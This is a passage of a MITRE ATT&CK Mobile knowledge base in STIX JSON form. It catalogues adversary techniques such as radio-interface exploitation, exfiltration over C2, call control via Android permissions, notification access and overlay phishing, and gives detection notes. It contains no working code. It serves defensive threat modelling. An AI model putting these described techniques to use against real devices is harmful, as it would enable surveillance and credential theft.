"description": "Andy Greenberg. (2009, July 28). How to Hijack 'Every iPhone In The World'. Retrieved December 23, 2016." + }, + { + "source_name": "Register-BaseStation", + "url": "http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/", + "description": "D. Pauli. (2015, November 12). Samsung S6 calls open to man-in-the-middle base station snooping. Retrieved December 23, 2016." + }, + { + "source_name": "ProjectZero-BroadcomWiFi", + "url": "https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html", + "description": "Gal Beniamini. (2017, April 4). Over The Air: Exploiting Broadcom's Wi-Fi Stack. Retrieved November 8, 2018." + }, + { + "source_name": "Weinmann-Baseband", + "url": "https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf", + "description": "R. Weinmann. (2012, August 6-7). Baseband Attacks: Remote Exploitation of Memory Corruptions in Cellular Protocol Stacks. Retrieved December 23, 2016." + }, + { + "source_name": "SRLabs-SIMCard", + "url": "https://srlabs.de/bites/rooting-sim-cards/", + "description": "SRLabs. (n.d.). SIM cards are prone to remote hacking. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.\n\n### Baseband Vulnerability Exploitation\n\nA message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).\n\n### Malicious SMS Message\n\nAn SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).", + "modified": "2022-04-06T15:42:13.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit via Radio Interfaces", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790", + "created": "2017-10-25T14:48:26.890Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1423", + "url": "https://attack.mitre.org/techniques/T1423" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).", + "modified": "2022-04-11T19:12:38.451Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Service Scanning", + "x_mitre_detection": "Network service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d", + "created": "2021-09-30T18:18:52.285Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1618", + "url": "https://attack.mitre.org/techniques/T1618" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:06:56.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "created": "2022-04-01T15:43:45.913Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1646", + "url": "https://attack.mitre.org/techniques/T1646" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "modified": "2022-04-08T16:25:44.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over C2 Channel", + "x_mitre_detection": "Exfiltration over C2 channel can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:49:53.301Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in order to to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructions, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. \n\nWhen initially gaining access to a device, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and applications running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user- level permission to root permissions depending on the component that is vulnerable. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "created": "2017-10-25T14:48:29.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1404", + "external_id": "T1404" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html", + "external_id": "APP-26" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:31:37.189Z", + "name": "Call Control", + "description": "Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.\n\nSeveral permissions may be used to programmatically control phone calls, including:\n\n* `ANSWER_PHONE_CALLS` - Allows the application to answer incoming phone calls(Citation: Android Permissions)\n* `CALL_PHONE` - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions)\n* `PROCESS_OUTGOING_CALLS` - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions)\n* `MANAGE_OWN_CALLS` - Allows a calling application which manages its own calls through the self-managed `ConnectionService` APIs(Citation: Android Permissions)\n* `BIND_TELECOM_CONNECTION_SERVICE` - Required permission when using a `ConnectionService`(Citation: Android Permissions)\n* `WRITE_CALL_LOG` - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions)\n\nWhen granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using `Intent.ACTION_DIAL`, which requires no specific permissions. This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_contributors": [ + "Gaetan van Diemen, ThreatFabric" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view their default phone app in device settings. Users can review available call logs for irregularities, such as missing or unrecognized calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "created": "2021-09-20T13:42:20.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1616", + "external_id": "T1616" + }, + { + "source_name": "Android Permissions", + "description": "Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.", + "url": "https://developer.android.com/reference/android/Manifest.permission" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html", + "external_id": "APP-41" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html", + "external_id": "CEL-42" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html", + "external_id": "CEL-36" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html", + "external_id": "CEL-18" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "created": "2022-04-06T13:22:57.683Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1639.001", + "url": "https://attack.mitre.org/techniques/T1639/001" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.", + "modified": "2022-04-06T13:23:10.087Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "x_mitre_detection": "Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:27:42.752Z", + "name": "Broadcast Receivers", + "description": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. \n\nAn intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received. \n\nIn addition to Android system intents, malicious applications can register for intents broadcasted by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications. \n\nIn Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Alex Hinchliffe, Palo Alto Networks" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can detect which broadcast intents an application registers for and which permissions it requests. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "created": "2022-03-30T14:41:00.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1624/001", + "external_id": "T1624.001" + }, + { + "source_name": "Android Changes to System Broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020.", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad", + "created": "2017-10-25T14:48:16.650Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1436", + "url": "https://attack.mitre.org/techniques/T1436" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. \n\nThey may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol.", + "modified": "2022-04-06T15:40:47.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Commonly Used Port", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--393e8c12-a416-4575-ba90-19cc85656796", + "created": "2017-10-25T14:48:26.104Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1439", + "url": "https://attack.mitre.org/techniques/T1439" + }, + { + "source_name": "mHealth", + "url": "https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps", + "description": "D. He et al.. (2014). Security Concerns in Android mHealth Apps. Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-0" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-1" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)", + "modified": "2022-04-05T20:17:46.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Eavesdrop on Insecure Network Communication", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-15T16:26:05.050Z", + "name": "Access Notifications", + "description": "Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can look for applications requesting the `BIND_NOTIFICATION_LISTENER_SERVICE` permission in a service declaration. Users can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access). ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "created": "2019-09-15T15:26:08.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1517", + "external_id": "T1517" + }, + { + "source_name": "ESET 2FA Bypass", + "description": "Lukáš Štefanko. (2019, June 17). Malware sidesteps Google permissions policy with new 2FA bypass technique. Retrieved September 15, 2019.", + "url": "https://www.welivesecurity.com/2019/06/17/malware-google-permissions-2fa-bypass/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9", + "created": "2017-10-25T14:48:14.982Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1410", + "url": "https://attack.mitre.org/techniques/T1410" + }, + { + "source_name": "Skycure-Profiles", + "url": "https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/", + "description": "Yair Amit. (2013, March 12). Malicious Profiles - The Sleeping Giant of iOS Security. Retrieved December 22, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.\n\nA malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.\n\nAlternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.\n\nAn adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.\n\nIf applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.", + "modified": "2022-04-15T17:52:24.123Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Traffic Capture or Redirection", + "x_mitre_detection": "On both Android and iOS the user must grant consent to an app to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is in place.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "created": "2017-10-25T14:48:34.407Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1411", + "url": "https://attack.mitre.org/techniques/T1411" + }, + { + "source_name": "Felt-PhishingOnMobileDevices", + "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf", + "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016." + }, + { + "source_name": "Android Background", + "url": "https://developer.android.com/guide/components/activities/background-starts", + "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019." + }, + { + "source_name": "Android-getRunningTasks", + "url": "https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29", + "description": "Android. (n.d.). ActivityManager getRunningTasks documentation. Retrieved January 19, 2017." + }, + { + "source_name": "Cloak and Dagger", + "url": "http://cloak-and-dagger.org/", + "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019." + }, + { + "source_name": "Group IB Gustuff Mar 2019", + "url": "https://www.group-ib.com/blog/gustuff", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019." + }, + { + "source_name": "eset-finance", + "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/", + "description": "Lukáš Štefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018." + }, + { + "source_name": "Hassell-ExploitingAndroid", + "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf", + "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019." + }, + { + "source_name": "XDA Bubbles", + "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/", + "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019." + }, + { + "source_name": "NowSecure Android Overlay", + "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/", + "description": "Ramirez, T.. (2017, May 25). ‘SAW’-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019." + }, + { + "source_name": "ThreatFabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019." + }, + { + "source_name": "StackOverflow-getRunningAppProcesses", + "url": "http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag", + "description": "Various. (n.d.). Android 5.1.1 and above - getRunningAppProcesses() returns my application package only. Retrieved January 19, 2017." + }, + { + "source_name": "Skycure-Accessibility", + "url": "https://www.skycure.com/blog/accessibility-clickjacking/", + "description": "Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-31" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.\n\nCompared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)\n\nSpecific approaches to this technique include:\n\n### Impersonate the identity of a legitimate application\n\nA malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. The malicious app could then prompt the user for sensitive information.(Citation: eset-finance)\n\n### Display a prompt on top of a running legitimate application\n\nA malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the `ActivityManager` API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to display a prompt include:\n\n* A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)\n\n### Fake device notifications\n\nA malicious application could send fake device notifications to the user. Clicking on the device notification could trigger the malicious application to display an input prompt.(Citation: Group IB Gustuff Mar 2019)", + "modified": "2022-04-05T19:52:32.190Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Input Prompt", + "x_mitre_detection": "The user 